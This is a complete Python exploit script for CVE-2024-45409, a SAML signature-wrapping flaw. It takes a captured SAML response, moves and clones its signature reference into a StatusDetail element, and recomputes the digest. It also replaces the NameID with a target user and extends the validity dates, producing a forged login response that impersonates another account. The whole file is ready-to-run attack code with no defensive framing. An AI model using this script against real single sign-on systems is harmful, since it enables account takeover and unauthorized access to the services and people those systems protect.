from argparse import ArgumentParser from base64 import b64decode, b64encode from copy import copy from datetime import datetime, timedelta, UTC from hashlib import sha1, sha256 from urllib.parse import quote, unquote from uuid import uuid4 from sys import stderr from lxml import etree NAMESPACES = { "ds": "http://www.w3.org/2000/09/xmldsig#", "saml": "urn:oasis:names:tc:SAML:2.0:assertion", "samlp": "urn:oasis:names:tc:SAML:2.0:protocol", } class CVE_2024_45409: def __init__( self, response_file: str, output_file_path: str, decode_input: bool, encode_output: bool, name_id: str, id_prefix: str, ) -> None: self._name_id = name_id self._id_prefix = id_prefix self._encode_output = encode_output self._output_file_path = output_file_path self._decode_input = decode_input self._response_file = response_file self._raw_response: bytes | None = None self._response_document: etree.Element | None = None self._signature: etree.Element | None = None self._original_assertion: etree.Element | None = None self.reference_id: str self._canonicalization_method: str | None = None self._digest_algorithm: str | None = None def exploit(self) -> None: print("[+] Parse response",file=stderr) self._parse() self._move_signature_in_assertion() print("[+] Patch response ID",file=stderr) self._response_document.attrib["ID"] = self._generate_unique_id() print("[+] Insert malicious reference",file=stderr) self._insert_malicious_reference() print(f"[+] Write patched file in {self._output_file_path}",file=stderr) self._write_output() def _write_output(self) -> None: data = etree.tostring(self._response_document) if self._output_file_path == "-": if self._encode_output: print(self.encode_response(data)) else: print(data.decode('utf-8')) return with open(self._output_file_path, "w") as outfile: data = self.encode_response(data) if self._encode_output else data.decode("utf-8") outfile.write(data) def _parse(self) -> None: with open(self._response_file) as infile: self._raw_response = ( self.decode_response(infile.read()) if self._decode_input else infile.read().encode("utf-8") ) self._response_document = etree.fromstring(self._raw_response) self._signature = self._response_document.find(".//ds:Signature", namespaces=NAMESPACES) self._canonicalization_method = self._signature.xpath( "//ds:Reference/ds:Transforms/ds:Transform/@Algorithm", namespaces=NAMESPACES, )[1] self._digest_algorithm = self._signature.xpath( "//ds:Reference/ds:DigestMethod/@Algorithm", namespaces=NAMESPACES, )[0] self._digest_algorithm = self._digest_algorithm[self._digest_algorithm.index("#") + 1 :] print(f"\tDigest algorithm: {self._digest_algorithm}",file=stderr) print(f"\tCanonicalization Method: {self._canonicalization_method}",file=stderr) def _move_signature_in_assertion(self) -> None: print("[+] Remove signature from response",file=stderr) self._signature.getparent().remove(self._signature) reference = self._signature.find(".//ds:Reference", namespaces=NAMESPACES) self.reference_id = reference.attrib["URI"].lstrip("#") print("[+] Patch assertion ID",file=stderr) assertion_element = self._response_document.find(".//saml:Assertion", namespaces=NAMESPACES) assertion_element.attrib["ID"] = self.reference_id print("[+] Patch assertion NameID",file=stderr) name_id_element = assertion_element.find(".//saml:NameID", namespaces=NAMESPACES) name_id_element.text = self._name_id print("[+] Patch assertion conditions",file=stderr) subject_confirm_data = self._response_document.find(".//saml:SubjectConfirmationData", namespaces=NAMESPACES) subject_confirm_data.attrib["NotOnOrAfter"] = (datetime.now(tz=UTC) + timedelta(1)).strftime("%Y-%m-%dT%H:%M:%SZ") conditions = self._response_document.find(".//saml:Conditions", namespaces=NAMESPACES) conditions.attrib["NotOnOrAfter"] = (datetime.now(tz=UTC) + timedelta(1)).strftime("%Y-%m-%dT%H:%M:%SZ") authn_statement = self._response_document.find(".//saml:AuthnStatement", namespaces=NAMESPACES) authn_statement.attrib["SessionNotOnOrAfter"] = (datetime.now(tz=UTC) + timedelta(1)).strftime("%Y-%m-%dT%H:%M:%SZ") self._original_assertion = copy(assertion_element) print("[+] Move signature in assertion",file=stderr) assertion_issuer = assertion_element.find(".//saml:Issuer", namespaces=NAMESPACES) assertion_element.insert(assertion_element.index(assertion_issuer) + 1, self._signature) def _insert_malicious_reference(self) -> None: status = self._response_document.find(".//samlp:Status", namespaces=NAMESPACES) status_code = status.find(".//samlp:StatusCode", namespaces=NAMESPACES) print("[+] Clone signature reference",file=stderr) reference = copy(self._response_document.find(".//ds:Reference", namespaces=NAMESPACES)) reference.attrib["URI"] = "#" + self.reference_id nsmap = {"samlp": "urn:oasis:names:tc:SAML:2.0:protocol", "dsig": "http://www.w3.org/2000/09/xmldsig#"} print("[+] Create status detail element",file=stderr) status_detail_element = etree.Element("{urn:oasis:names:tc:SAML:2.0:protocol}StatusDetail", nsmap=nsmap) status_detail_element.insert(0, reference) status.insert(status.index(status_code) + 1, status_detail_element) new_element = etree.Element( self._original_assertion.tag, nsmap={ "saml": "urn:oasis:names:tc:SAML:2.0:assertion", }, ) for attrib, value in self._original_assertion.attrib.items(): new_element.set(attrib, value) for child in self._original_assertion: new_element.append(child) new_element.text = self._original_assertion.text if self._canonicalization_method == "http://www.w3.org/2001/10/xml-exc-c14n#": method = "c14n" else: raise ValueError("Canonicalization method unknown") new_element_canonical = etree.tostring(new_element, method=method, exclusive=True, with_comments=False) if self._digest_algorithm == "sha256": digest = sha256(new_element_canonical).digest() elif self._digest_algorithm == "sha1": digest = sha1(new_element_canonical).digest() else: raise ValueError("Digest algorithm unknown") print("[+] Patch digest value",file=stderr) digest_value = reference.find(".//ds:DigestValue", namespaces=NAMESPACES) digest_value.text = b64encode(digest).decode("utf-8") def _generate_unique_id(self) -> str: return f"{self._id_prefix}{uuid4()}" @staticmethod def decode_response(data: str) -> bytes: return b64decode(unquote(data)) @staticmethod def encode_response(data: bytes) -> str: return quote(b64encode(data)) def __str__(self) -> str: return etree.tostring(self._response_document, pretty_print=True).decode("utf-8") if __name__ == "__main__": parser = ArgumentParser( description="CVE-2024-45409 exploit", ) parser.add_argument( "-r", "--response-file", type=str, required=True, help="Raw or URL + Base64 encoded XML SAMLResponse content file path", default="response.xml", ) parser.add_argument( "-o", "--output-file", type=str, help="Patched SAMLResponse output file path, use - for stdout", default="response_patched.xml", ) parser.add_argument("-n", "--nameid", type=str, required=True, help="Target NameID") parser.add_argument("-d", "--decode", action="store_true", help="Decode URL + Base64 encoded response file") parser.add_argument("-e", "--encode", action="store_true", help="Encode Base64 + URL output") parser.add_argument("-p", "--prefix", type=str, help="ID prefix", default="ID-") args = parser.parse_args() CVE_2024_45409( response_file=args.response_file, output_file_path=args.output_file, decode_input=args.decode, encode_output=args.encode, name_id=args.nameid, id_prefix=args.prefix, ).exploit()